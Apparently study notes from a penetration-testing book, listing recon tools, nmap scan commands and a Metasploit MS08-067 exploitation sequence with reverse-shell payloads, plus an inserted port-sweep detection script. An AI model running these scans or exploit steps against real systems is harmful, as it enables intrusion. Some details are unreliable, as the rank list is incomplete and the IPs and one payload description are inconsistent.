
recon

HTTrack website copier
Google directives
theHarvester (email harvester)
whois.net
netcraft
host
nslookup
email extractor
(One of the first things to do when attempting to recon an e-mail server is to send an e-mail to the organization with an empty .bat file or a nonmalicious .exe file like calc.exe.)

scanning
ping
port scanning

Port Number   Service
20            FTP data transfer
21            FTP control
22            SSH
23            Telnet
25            SMTP (e-mail)
53            DNS
80            HTTP
443           HTTPS

TCP
To run a TCP connect scan, we issue the following command from a terminal:
nmap -sT -p- -PN 172.16.45.135

SYN
To run a SYN scan, you can open a terminal window and issue the following command:
nmap -sS -p- -PN 172.16.45.135

UDP
To run a UDP scan against our target, we would enter the following command in a terminal:
nmap -sU 172.16.45.129
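Added here as a defender-side counterpart to the scans above (this is not code from these notes or from the book they summarize): the -p- option sweeps every port, which is what a sensor should notice. The script below groups constructed connection records by source address and protocol and flags any source that touches many distinct destination ports inside a short time window. The log format, sample addresses and thresholds are assumptions.

```python
from collections import defaultdict

# Constructed sample records (not real traffic):
# epoch_seconds protocol source destination dest_port tcp_flags
SAMPLE_LOG = """\
1700000000 tcp 172.16.45.135 172.16.45.129 22 S
1700000001 tcp 172.16.45.135 172.16.45.129 23 S
1700000001 tcp 172.16.45.135 172.16.45.129 25 S
1700000002 tcp 172.16.45.135 172.16.45.129 53 S
1700000002 tcp 172.16.45.135 172.16.45.129 80 S
1700000003 tcp 172.16.45.135 172.16.45.129 443 S
1700000003 tcp 172.16.45.135 172.16.45.129 445 S
1700000004 tcp 172.16.45.135 172.16.45.129 3389 S
1700000010 tcp 10.0.0.7 172.16.45.129 443 S
1700000011 tcp 10.0.0.7 172.16.45.129 443 S
1700000012 udp 172.16.45.135 172.16.45.129 53 -
1700000012 udp 172.16.45.135 172.16.45.129 161 -
"""

def parse_records(text):
    """Parse the assumed whitespace-separated log format into dicts."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, proto, src, dst, dport, flags = line.split()
        records.append({"ts": int(ts), "proto": proto, "src": src,
                        "dst": dst, "dport": int(dport), "flags": flags})
    return records

def find_port_sweeps(records, min_ports=6, window=30):
    """Return {(src, proto): sorted ports} for every source that reaches
    at least min_ports distinct destination ports within `window` seconds."""
    by_key = defaultdict(list)
    for r in records:
        by_key[(r["src"], r["proto"])].append((r["ts"], r["dport"]))
    alerts = {}
    for key, events in by_key.items():
        events.sort()
        counts = defaultdict(int)   # distinct ports currently inside the window
        left = 0
        for ts, port in events:
            counts[port] += 1
            while ts - events[left][0] > window:   # slide the window forward
                old = events[left][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                left += 1
            if len(counts) >= min_ports:
                alerts[key] = sorted(counts)
    return alerts

if __name__ == "__main__":
    for (src, proto), ports in find_port_sweeps(parse_records(SAMPLE_LOG)).items():
        print(f"port sweep from {src} over {proto}: {ports}")
```

A real sensor would read the same fields from firewall or NetFlow exports; the thresholds need tuning so that a legitimate client touching a handful of services is not flagged.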

vulnerability scanning
www.nessus.org.

exploit
Using Metasploit, starting from your Nessus result, type:
msf > search ms08-067

(After searching, Metasploit found a matching exploit and provided us with several pieces of information about the exploit.
● First it provided us with a name and location: "windows/smb/ms08_067_netapi."
● Next Metasploit provided us with a "Rank."
It is important to pay close attention to the exploit rank. This information provides details about how dependable the exploit is (how often the exploit is successful) as well as how likely the exploit is to cause instability or crashes on the target system. Numerically, the higher an exploit is ranked, the more likely it is to succeed and the less likely it is to cause disruptions on the target system. Metasploit uses seven ratings to rank each exploit:
1. Manual
2. Low
3. Average
4. Normal
5. Good
)

msf > use windows/smb/ms08_067_netapi

msf  show payloads

msf  set payload windows/vncinject/reverse_tcp

msf > show options


After issuing the show options command, we are presented with a series of choices that are specific to the payload we have chosen. When using the "windows/vncinject/reverse_tcp" payload, we see that there are two options that need to be set because they are missing any default information. The first is "RHOST" and the second is "LHOST." RHOST is the IP address of the remote host and LHOST is the IP address you are attacking from. To set these options, we issue the "set option_name" command in the msf terminal:
msf > set RHOST 172.168.45.130
msf > set LHOST 172.168.45.135

msf > show options

msf > exploit

Metasploit Payload Name            Payload Description
windows/adduser                    Create a new user in the local administrator group on the target machine
windows/exec                       Execute a Windows binary (.exe) on the target machine
windows/shell_bind_tcp             Open a command shell on the target machine and wait for a connection
windows/shell_reverse_tcp          Target machine connects back to the attacker and opens a command shell (on the target)
windows/meterpreter/bind_tcp       Target machine installs the Meterpreter and waits for a connection
windows/meterpreter/reverse_tcp    Installs Meterpreter on the target machine then creates a connection back to the attacker
windows/vncinject/bind_tcp         Installs VNC on the target machine and waits for a connection
windows/vncinject/reverse_tcp      Installs VNC on the target machine and sends VNC connection back to target
